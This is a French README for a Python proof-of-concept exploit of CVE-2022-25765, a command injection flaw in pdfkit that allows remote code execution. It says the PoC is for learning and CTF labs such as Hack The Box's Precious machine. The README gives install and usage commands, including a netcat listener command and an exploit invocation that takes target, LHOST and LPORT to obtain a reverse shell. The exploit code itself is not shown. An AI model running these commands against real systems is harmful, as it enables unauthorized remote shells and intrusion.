
Preuve de concept en Python pour CVE-2022-25765, une vulnérabilité d'injection de commandes dans pdfkit, permettant l'exécution de code à distance via une génération de PDF malveillante.
PoC pour CVE-2022-25765, affectant les versions vulnérables de pdfkit.
Testé avec pdfkit 0.8.6.
requestscoloramaInstaller les dépendances :
pip3 install -r requirements.txt
Ou manuellement :
pip3 install requests colorama
python3 exploit2.py -u <TARGET> -l <LHOST> -p <LPORT>
Exemple : Lancer un listener
nc -lvnp 4242
python3 exploit2.py -u http://10.10.10.10 -l 10.10.14.5 -p 4444
Cloner le dépôt :
git clone [email protected]:innocentx0/CVE-2022-25765.git
cd CVE-2022-25765
Installer les prérequis :
pip3 install -r requirements.txt
Exécuter le PoC contre votre cible de laboratoire.
CVE-2022-25765 est une vulnérabilité d'injection de commandes dans les versions vulnérables de pdfkit.
Le problème est lié à une désinfection insuffisante des entrées contrôlées par l'utilisateur transmises au processus de génération de PDF.
Ce PoC a été créé principalement pour l'apprentissage et les environnements CTF/laboratoire.
Si vous cherchez un endroit pour l'essayer, Hack The Box : Machine : Precious.
Utilisez ceci uniquement contre des systèmes que vous possédez ou pour lesquels vous avez une autorisation explicite de test.
Je ne suis pas responsable des mauvais usages ou des dommages causés par ce projet.
INNOCENTx0